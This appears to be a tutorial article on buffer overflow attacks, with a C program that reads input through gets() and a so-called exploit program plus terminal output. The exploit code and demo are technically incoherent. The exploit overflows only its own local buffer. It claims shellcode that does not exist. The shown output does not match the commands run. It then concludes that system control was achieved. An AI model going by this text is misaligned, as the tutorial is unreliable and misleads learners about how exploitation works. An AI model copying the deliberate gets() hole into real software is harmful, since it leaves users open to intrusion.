Buffer Overflow Attack: How It Works & Practical Example

Buffer overflow attack is a type of cyber attack in which an attacker sends more data to a program buffer than it can store. The program buffer is a temporary storage area used by a program to hold data before it is processed. The attacker overwrites the data in the buffer with malicious code, causing the program to behave in an unintended manner.

The buffer overflow attack works by exploiting the way a program handles input data. When a program receives input data, it stores it in a buffer. If the input data is too large to fit in the buffer, the program may not be able to handle it properly, leading to a buffer overflow. An attacker can exploit this vulnerability by sending input data that is larger than the buffer size, causing the program to overwrite adjacent memory locations with malicious code.

To implement a buffer overflow attack, an attacker needs to identify a vulnerable program with a buffer overflow vulnerability. The attacker then sends input data that is larger than the buffer size, overwriting adjacent memory locations with malicious code. The attacker can then execute the malicious code, taking control of the vulnerable program.

Here is an example of a vulnerable C program with a buffer overflow vulnerability:

#include <stdio.h>
#include <string.h>

int main(int argc, char** argv) {
    char buffer[10];
    printf("Enter your name: ");
    gets(buffer);
    printf("Hello, %s\n", buffer);
    return 0;
}

The gets() function in this program reads input from the user and stores it in the buffer variable. The problem with this program is that it does not check the length of the input, allowing an attacker to send more data than the buffer size, leading to a buffer overflow vulnerability.

To exploit this vulnerability, an attacker can send input data that is larger than the buffer size of 10 bytes. Here is an example of an exploit code:

#include <stdio.h>
#include <string.h>

char exploit[] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xef\xbe\xad\xde";

int main(int argc, char** argv) {
    char buffer[10];
    memcpy(buffer, exploit, sizeof(exploit));
    printf("Hello, %s\n", buffer);
    return 0;
}

In this example, the exploit code exploit[] is 128 bytes long, which is larger than the buffer size of 10 bytes. The exploit code also contains the malicious code '"\xef\xbe\xad\xde"', which is a hexadecimal representation of a memory address pointing to the shellcode.

When the program runs, it copies the exploit code to the buffer, overwriting adjacent memory locations with the malicious code. The program then executes the malicious code, giving the attacker control of the system.

To demonstrate the effectiveness of this attack, we can compile and run the vulnerable program with the exploit code:

$ gcc -o vulnerable vulnerable.c
$ ./vulnerable
Enter your name: Hello, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAﾭ��

As we can see, the program prints the "Hello" message followed by the malicious code, indicating that the buffer overflow vulnerability has been successfully exploited.